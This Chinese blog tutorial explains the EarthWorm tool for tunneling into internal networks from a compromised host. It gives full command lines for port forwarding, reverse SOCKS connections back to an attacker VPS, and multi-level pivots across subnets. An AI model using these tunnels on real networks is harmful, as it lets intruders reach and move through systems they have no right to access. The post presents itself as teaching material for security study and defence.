内网穿透-EW贯穿内网

admin
admin
admin
138635
文章
114
评论
2021年7月27日03:23:46评论160 views字数 2169阅读7分13秒阅读模式
内网穿透-EW贯穿内网
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚

EW

官网介绍啊:EW 是一套便携式的网络穿透工具,集socks代理和端口转发与一身,支持正向、反向、多级级联方式为我们打通隧道。而且支持多系统,可在复杂网络环境(win,linux,mac之间)完成网络穿透。
官网:http://rootkiter.com/EarthWorm/

这工具的代理借鉴了ssocks,端口转发是借鉴了Lcx工具的使用方法,今就详细研究研究一下这个工具
工具使用

这里提一嘴啊,代理和端口转发不太一样
代理是我们可以使用它ip进行网络访问
端口转发是一个端口转到另一个端口,只能访问特定端口
-l 指定监听的本地端口-d 指定反弹到的机器 ip-e 指定反弹到的机器端口-f 指定主动连接的机器 ip-g 指定主动连接的机器端口
端口转发

lcx用法一个样,将本机8000端口,lcx_tran映射到本机(或目标)的3389端口
ew_win32.exe -s lcx_tran -l 8000 -f 127.0.0.1 -g 3389
内网穿透-EW贯穿内网
或者使用lcx_listenlcx_slave配合实现,访问1080转发的目标(本机)的3389
ew_win32.exe -s lcx_listen -l 1080 -e 8082ew_win32.exe -s lcx_slave -d 127.0.0.1 -e 8082 -f 192.168.10.27 -g 3389
内网穿透-EW贯穿内网
内网穿透-EW贯穿内网

Socks代理

场景:我有台VPS(192.168.10.11),和已经拿下的目标主机(外网ip:180.180.180.1,内网ip:10.10.10.2),我想通过目标主机扫内网(10.10.10.0/24)

正向代理
将工具上传到目标主机,开通一个端口直接变成socks5代理服务器
ew_win32.exe -s ssocksd -l 8082
内网穿透-EW贯穿内网
这样我们就设置浏览器代理,使用目标ip上网了,也可以访问内网段

反向代理
VPS先开8082端口等待目标主机连接,然后vps开个8000端口当代理端口
ew_win32.exe -s rcsocks -l 8000 -e 8082
内网穿透-EW贯穿内网
将工具上传目标主机,并反弹到VPS的8082端口
ew_win32.exe -s rssocks -d 192.168.10.11 -e 8082
内网穿透-EW贯穿内网
我们就可以连接VPS的8080端口,使用目标ip(180.180.180.1)上网了,也可以访问内网10.10.10.0/24。
此时的目标机有流量经过
内网穿透-EW贯穿内网

多级级联

场景:一台外网服务器A(202.202.101.101,192.168.10.2),内网主机B(192.168.10.3,10.10.10.5)和内网主机C(10.10.10.6)
AB主机之间互通,BC之间互通,AC之间不能连接,BC不能出网,尝试访问C主机
内网穿透-EW贯穿内网
该工具能多级级联是因为,端口转发和代理服务直接可以互通,所以实现了强大的多层内网穿透功能

二级级联
方法a:
B主机先开8001端口等待正向连接
ew_win32.exe -s ssocksd -l 8001
A主机使用端口映射,将A的1080端口映射到B的8001端口
ew_win32.exe -s lcx_tran -l 1080 -f 192.168.10.3 -g 8001
这样我们连接A主机的1080端口,就可以访问C主机

方法b:
A主机监听1080和8080,然后A的8080端口转发到B的8001端口
ew_win32.exe -s lcx_listen -l 1080 -e 8080ew_win32.exe -s lcx_slave -d 127.0.0.1 -e 8080 -f 192.168.10.3 -g 8001
主机B监听自身8001端口转为socks服务
ew_win32.exe -s ssocksd -l 8001

三级级联
场景:添加一台主机D只能C主机访问D主机10.10.30.5

C主机先开8001端口等待正向连接
ew_win32.exe -s ssocksd -l 8001
B主机设置端口转发,起到中间隧道作用
ew_win32.exe -s lcx_slave -d 192.168.10.2 -e 7000 -f 10.10.10.6 -g 8081
A主机使用监听7000等待端口连接
ew_win32.exe -s lcx_listen -l 1080 -e 7000ew_win32.exe -s rcsocks -l 1080 -e 7000
这样我们连接A主机的1080端口,就可以访问D主机

再换个方法:
C主机反向连接B主机的8081
ew_win32.exe rssocks -d 10.10.10.5 -e 8081
B主机监听8081端口等待C主机反弹,将8080和8081打通隧道,然后连接A主机的7000并转发到B的8080
ew_win32.exe -s lcx_listen -l 8080 -e 8081ew_win32.exe -s lcx_slave -d 192.168.10.2 -e 7000 -f 127.0.0.1 -g 8080
A主机将监听7000端口等待B主机连接
ew_win32.exe -s rcsocks -l 1080 -e 7000
这样我们连接A主机的1080即可访问D主机
再多级就是在添加B主机的相同操作在中间当隧道即可

可惜
这款工具是用的非常舒服的一个、但是种种原因,已被停更和查杀了。
内网穿透-EW贯穿内网

本文始发于微信公众号(XG小刚):内网穿透-EW贯穿内网

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月27日03:23:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网穿透-EW贯穿内网https://cn-sec.com/archives/386266.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息